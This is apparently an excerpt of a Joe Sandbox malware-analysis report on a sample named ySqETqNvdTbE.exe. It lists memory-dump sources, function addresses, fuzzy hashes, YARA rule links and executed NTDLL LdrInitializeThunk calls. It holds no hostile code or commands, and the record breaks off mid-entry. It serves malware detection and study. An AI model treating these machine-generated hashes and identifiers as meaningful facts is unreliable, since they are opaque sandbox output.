Memory Dump Source

Source File: 0000000B.00000002.1561112045.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7390000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e5023026d457a1246949d34305c03a2a397cfde0762832bcc9631e73e3e059c
Instruction ID: e092ff8712a684825ced7fd84ec4131f87873327e30b099f5de294196e4c14f8
Opcode Fuzzy Hash: 0e5023026d457a1246949d34305c03a2a397cfde0762832bcc9631e73e3e059c
Instruction Fuzzy Hash: E121FFB5804349DFDB10CF9AD884ADEFBF9FB48310F10842AE959A7211C374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FED4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1552565070.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fed000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
Instruction ID: 9f06102d4d3310a841844b3a55073a2c24606db179e0ae275606231b785be1d1
Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
Instruction Fuzzy Hash: E511E676904380CFCB15CF10D9C4B16BF71FB94328F28C6A9D8490B656C336D85ADBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FED3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1552565070.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fed000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
Instruction ID: 0be5a911004ed1ed9b9dfbbac189c850a13d0d0b88d4da8f38d527f5f71c74f1
Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
Instruction Fuzzy Hash: 5011E676904280DFCB15CF10D5C4B16BF71FBA4324F24C6A9D8490B657C33AE85ADBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07399B24 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1561112045.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7390000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 910724ef51dfc8a7d49b729c429a9b023130665bfa7c65c455ddbd3e843c4a32
Instruction ID: e42838296083f3e7df998220a39b152c092dc82a8d5d11ed0f01d13db7267646
Opcode Fuzzy Hash: 910724ef51dfc8a7d49b729c429a9b023130665bfa7c65c455ddbd3e843c4a32
Instruction Fuzzy Hash: 29F0F9F160D3899FFF02E7749811A79BBA89F42104B1484BBD819C7341E9249C158363

Uniqueness

Uniqueness Score: -1.00%

Function 00FED731 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1552565070.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fed000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8abf0bce9f2725288698a0721cfc6e487927a6407d07a151c0d3b5480c9af186
Instruction ID: c1d732f5e95a67610777e5b395db90e394f5bba3c70b518830a4be5feb417c14
Opcode Fuzzy Hash: 8abf0bce9f2725288698a0721cfc6e487927a6407d07a151c0d3b5480c9af186
Instruction Fuzzy Hash: F901DB72409384DBE7244B67CDC4B66FFD8DF41335F14C469ED494A682C6789C40D672

Uniqueness

Uniqueness Score: -1.00%

Function 07396C88 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1561112045.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7390000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e77a6729a1bd48540d0734feedef8ea07233729853128302f1e07b0eb787fadb
Instruction ID: 2a5cfcca4c75d19bc6cecbdb6817f128fddb24a3e232f8164dbeb4659e26fc3a
Opcode Fuzzy Hash: e77a6729a1bd48540d0734feedef8ea07233729853128302f1e07b0eb787fadb
Instruction Fuzzy Hash: B111D67492160CDFCB80DF99E0859ADBFF0FB48310F5691D6E88497315DB309AA0CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00FED730 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1552565070.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fed000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 008cba5b1defbf1185508263f043e4f5a136c96ef41401fa708bc5c6d32d975a
Instruction ID: 9dfae97da5ad8ada8e6683f7aed75d40f2f012020880c6731aa6c693dbfc8bcb
Opcode Fuzzy Hash: 008cba5b1defbf1185508263f043e4f5a136c96ef41401fa708bc5c6d32d975a
Instruction Fuzzy Hash: A8F0C2724083849EE7108B16CC84B62FFD8EB90334F18C45AED080E282C2789C44CA71

Uniqueness

Uniqueness Score: -1.00%

Function 0739A2E0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1561112045.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7390000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fa25e7171a2aa8ac086ff9394a49db50b83b889f664c63901f387eedbb6d31b
Instruction ID: 554d1fcf592e677b08b0012d25bfe2f64b66366ed5d3ac94f3d01b818dd1f0d9
Opcode Fuzzy Hash: 7fa25e7171a2aa8ac086ff9394a49db50b83b889f664c63901f387eedbb6d31b
Instruction Fuzzy Hash: 2E01BFB0800219DFEF14DF5AC4447AE7AF5FF45354F14C635E468AA190D7754A44CF91

Uniqueness

Uniqueness Score: -1.00%

Function 07399B7C Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1561112045.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7390000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 781900c790f12da493a962d65e2958c1e2b82cc07d848233b99c8a76efc01625
Instruction ID: 733e578e5c50552177bfe4d51335b90bcc66d56848202c070f43e72e96186db2
Opcode Fuzzy Hash: 781900c790f12da493a962d65e2958c1e2b82cc07d848233b99c8a76efc01625
Instruction Fuzzy Hash: 03F082B2604209AFAF04DF59D880E9EBBADEF48214B04807AE809D7310EA31E9108755

Uniqueness

Uniqueness Score: -1.00%

Function 0739A380 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1561112045.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7390000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f0966af2f47917dff71cd5bc68427b3e30dbca9c5f814cc5329257ad5524971
Instruction ID: bf61319e6929570dfbd0f9c5ab3ced3bd828951abcd0d5a7abb0c45f51356d42
Opcode Fuzzy Hash: 1f0966af2f47917dff71cd5bc68427b3e30dbca9c5f814cc5329257ad5524971
Instruction Fuzzy Hash: 54E030727001145F5314966ADC84D6BB7EEEBCC6607118079F508C7310D9319C0186A0

Uniqueness

Uniqueness Score: -1.00%

Function 07396930 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1561112045.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7390000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca00be217ebca08986d4f0ee03eae2e81a4c70024febf04b93ef500721b14343
Instruction ID: 1bdea0f83f6e6547550f85f8f600d0d7f9b4a477627861f85ce7bac983f53282
Opcode Fuzzy Hash: ca00be217ebca08986d4f0ee03eae2e81a4c70024febf04b93ef500721b14343
Instruction Fuzzy Hash: 58F0AFB4D15219EFDB44DFA9C5866ADBBF8EF4A300F1095AAD819A7321EB705A40CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0739F120 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1561112045.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7390000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99f02c3c1843657177266966740296cf95f657e6e01f96f376ae57fff37a8c46
Instruction ID: f0e3f14d86e293a7b986c303b88e9c6e7bb70ca29f8c3eb94aaee8b5255bc8ab
Opcode Fuzzy Hash: 99f02c3c1843657177266966740296cf95f657e6e01f96f376ae57fff37a8c46
Instruction Fuzzy Hash: 41E092E171061AD7EB1455A6D80467776AFABC2710F14807AA51A97744C960AC0297D0

Uniqueness

Uniqueness Score: -1.00%

Function 0739E508 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1561112045.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7390000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0b9f886e4e455f9cf313224f9dedaad940a4186c51ac4ac15d6aa95a59b3378
Instruction ID: 0f0ffab91ba080d5edd6f0e5899b746b5f79d7d72b301d578a73a8518575ca9b
Opcode Fuzzy Hash: b0b9f886e4e455f9cf313224f9dedaad940a4186c51ac4ac15d6aa95a59b3378
Instruction Fuzzy Hash: 1DF0A2F36A4101EFFF54C625D080625376DAB45355FB47879E00F8AA05F662DC83CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0739E568 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1561112045.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7390000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22dd948caabcb43468ee40fc6f00e25a56692b5164c4793487a543ed23d22d66
Instruction ID: 5a08b1a5c8d1d8d14e8be1c317842de8c7b372c2fe76a34a1598269206e761b3
Opcode Fuzzy Hash: 22dd948caabcb43468ee40fc6f00e25a56692b5164c4793487a543ed23d22d66
Instruction Fuzzy Hash: C5E09BF2954700DB6724DA5B5400493BBDEBBC5720754C93BC05E42904FA71DD059592

Uniqueness

Uniqueness Score: -1.00%

Function 0739F0D0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1561112045.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7390000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abdb40339d4dd20e0f5436bab1a2a8282be886cf7a79e08c06f500bd19fb0280
Instruction ID: 191a25167729174d420e9eb85dcc2133e4f6943273bbdce468cfaa0804afb507
Opcode Fuzzy Hash: abdb40339d4dd20e0f5436bab1a2a8282be886cf7a79e08c06f500bd19fb0280
Instruction Fuzzy Hash: 5AE092F1628753CBFB548A1798004377BAD69D2391B14C23BE00EC6A00EF6095428696

Uniqueness

Uniqueness Score: -1.00%

Function 0739FAF8 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1561112045.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7390000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 566f8ad59ccb9c55ead6f8f44312fd095868d6ba64f2196515c1c5e14a315680
Instruction ID: 95f550a5c9367488ecde2e90696c712c281f2ecfdb8cfc4aa5681abb9fe66ee0
Opcode Fuzzy Hash: 566f8ad59ccb9c55ead6f8f44312fd095868d6ba64f2196515c1c5e14a315680
Instruction Fuzzy Hash: 36F0D4F0D1420ADFEB44EFA9C852AAEBBF4AB08310F108569D518E7240E77096008B90

Uniqueness

Uniqueness Score: -1.00%

Function 07398B20 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1561112045.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7390000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3747aa1367b0a08b3371c1868e9744bf81f737c73e42f176890c16ab80605be
Instruction ID: aa7e0dbb5e2ff699d9caeb16b71e0e3cefe08592b966449850828f5097c0d4cc
Opcode Fuzzy Hash: c3747aa1367b0a08b3371c1868e9744bf81f737c73e42f176890c16ab80605be
Instruction Fuzzy Hash: 97E01AB4E05208EFCB84DFA8D4416ACFBF4EB8A300F18C0AA981C93340D7319A01DF84

Uniqueness

Uniqueness Score: -1.00%

Function 0739E7A8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1561112045.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7390000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5589f91b9b200e89f4ee412e876d3bc005dfb0d822974a6b4410c4ccbdbc588
Instruction ID: 1fb145b1a87de976e1d9960510a22ddb0b45755b680e0e18acfc5d6f53d2db90
Opcode Fuzzy Hash: e5589f91b9b200e89f4ee412e876d3bc005dfb0d822974a6b4410c4ccbdbc588
Instruction Fuzzy Hash: BEE0C2B296421CA7DF298E61C8048AF7F7EEF86380F010039E80273740DE702C1187D0

Uniqueness

Uniqueness Score: -1.00%

Function 07397280 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1561112045.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7390000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d2f703bdc0be9f962bedd1b48c5d2b59b99f83ec74399d429461ba58bf05766
Instruction ID: baae246fd1a7734ffe7067ed459303e1d092c27b42fd553cb7f613a966eb9654
Opcode Fuzzy Hash: 9d2f703bdc0be9f962bedd1b48c5d2b59b99f83ec74399d429461ba58bf05766
Instruction Fuzzy Hash: 30E08CB152530CDFDB00DFA085056E97BF8EB4B201F0848A6A40983250EE300A00EB85

Uniqueness

Uniqueness Score: -1.00%

Function 0739FB98 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1561112045.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7390000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aa03c8f074365173fa5c14a7bae84bd7623831663a8b6e5e2df8cdbce0eda00
Instruction ID: b14be7405a9d994bab103caf76b9242df37462362d31195e5a267ee27754a6ce
Opcode Fuzzy Hash: 8aa03c8f074365173fa5c14a7bae84bd7623831663a8b6e5e2df8cdbce0eda00
Instruction Fuzzy Hash: E4D0127221020D9EAF40EE95E800D52BBEDBB54710B418432E50CC7030E621E524D751

Uniqueness

Uniqueness Score: -1.00%

Function 07399B34 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1561112045.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7390000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ac04da573cda91dfc1758430b87cd266fc39de180d2c5bd50b1953084da88d5
Instruction ID: cdf2259a74942e2a55aef4e227fb8a0201b2084e6228b4b1e39ec7e7e23b0a7f
Opcode Fuzzy Hash: 5ac04da573cda91dfc1758430b87cd266fc39de180d2c5bd50b1953084da88d5
Instruction Fuzzy Hash: 9DB012E51A8700E37C0167A88CC1F3A9210EFFA701F408D2D760F0164089234438D11B

Uniqueness

Uniqueness Score: -1.00%

Function 0739DAC8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1561112045.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7390000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f2ce0563a58bf968532cb972687b5480eaf4621c103d962ca8b2ca79ab8f34d
Instruction ID: 3d90f48dc215fd73b3760f30279081be2df506085059b85e81e41df4ceb74a67
Opcode Fuzzy Hash: 7f2ce0563a58bf968532cb972687b5480eaf4621c103d962ca8b2ca79ab8f34d
Instruction Fuzzy Hash: 2FA0123005430C8BD6802B50B44E2197B1CA5002017444062F00E84802DE3818004548

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ySqETqNvdTbE.exePID: 1544, Parent PID: 8176COMMON

Execution Graph

Execution Coverage:	0.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	34
Total number of Limit Nodes:	2

Executed Functions

Function 019A2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(019BFD4F,000000FF,00000024,01A56634,00000004,00000000,?,-00000018,7D810F61,?,?,01978B12,?,?,?,?), ref: 019A2C24

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7f4c3a3f404773b14940471ac754d3c8da14192557abeccd143bfe8b7f8f9190
Instruction ID: 021f0e1c343fbe31f4484c91a350e858fa907eec214df5ddbbc60ea738792688
Opcode Fuzzy Hash: 7f4c3a3f404773b14940471ac754d3c8da14192557abeccd143bfe8b7f8f9190
Instruction Fuzzy Hash: 81B09B71D015C5C5DA11E7644B0C717795877D0701F55C061D2070641F4738C1D5E6B5

Uniqueness

Uniqueness Score: -1.00%

Function 019A2BF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(019B7BA5,000000FF,?,00000000,?,00001000,00000000,?,-00000018,7D810F61,?,?,?,?), ref: 019A2BFA

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c1b0fd6a381122fc704f3f23bd182e3575ac3144121ae642072e61a02ac3752a
Instruction ID: 2362885051d21f2165c65cae08b688a7ac00e663f5ed4af0bfa4543d148ef485
Opcode Fuzzy Hash: c1b0fd6a381122fc704f3f23bd182e3575ac3144121ae642072e61a02ac3752a
Instruction Fuzzy Hash: FC90023120150802D1807158494868A404D97D5301F95C015A0066654DCA158B597BA1

Uniqueness

Uniqueness Score: -1.00%

Function 019A2B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(019D0DBD,?,?,?,?,019C4302), ref: 019A2B6A

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e504d5e6088bcb85ff60a03a0e1183af3f2c6bcf84bd14ef299575888028f2e0
Instruction ID: c3c09a34a4f900d3546fa8d557c5446647d335631c12e4d2164cc17e5eb513f8
Opcode Fuzzy Hash: e504d5e6088bcb85ff60a03a0e1183af3f2c6bcf84bd14ef299575888028f2e0
Instruction Fuzzy Hash: 8090026120250003410571584958656804E97E4201B55C021E1055590DC52589916625

Uniqueness

Uniqueness Score: -1.00%

Function 019A2AD0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(019D9864,?,00000000,00000000,00000000,?,00000000,?,?,00000000,?,019A034A,?,?,?,00000003), ref: 019A2ADA

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c80a94a8704208ff3cd2c3e55d9bc6ce84441b3a3d25021e16c9ef9310359100
Instruction ID: f808e2049df76515964a7279370111fa6c7fd1b6cc358ae30f4572088cc3596c
Opcode Fuzzy Hash: c80a94a8704208ff3cd2c3e55d9bc6ce84441b3a3d25021e16c9ef9310359100
Instruction Fuzzy Hash: 61900225211500030105B5580B48547408E97D9351355C021F1056550CD62189615621

Uniqueness

Uniqueness Score: -1.00%

Function 019A2DD0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(019B91A3,00000000,00000000,?,?,?,01968A1A,01A3C2B0,00000018,01958873), ref: 019A2DDA

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b40f49a2ae013efa5803f9d72be356fb60919b674b84ed1b19e3270ae652f335
Instruction ID: 24cebb87e7374595e4a689b570de768165abded6858821cb9e905d7a6334535a
Opcode Fuzzy Hash: b40f49a2ae013efa5803f9d72be356fb60919b674b84ed1b19e3270ae652f335
Instruction Fuzzy Hash: 71900221242541525545B1584948547804EA7E4241795C012A1455950CC5269956DB21

Uniqueness

Uniqueness Score: -1.00%

Function 019A2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(019DE73E,0000005A,01A3D040,00000020,00000000,01A3D040,00000080,019C4A81,00000000,?,?,00000002,00000000,?,?,019AAE00), ref: 019A2DFA

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c6122dfeaddfc189ab2582fa4ded44e032d00b3130b5666b8adccd312a393d13
Instruction ID: c8ce9141e0c6656d5d0085e37f179e15fbfe9d4a3375141ac7514f717357a50a
Opcode Fuzzy Hash: c6122dfeaddfc189ab2582fa4ded44e032d00b3130b5666b8adccd312a393d13
Instruction Fuzzy Hash: 2590023120150413D11171584A48747404D97D4241F95C412A0465558DD6568A52A621

Uniqueness

Uniqueness Score: -1.00%

Function 019A2D10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

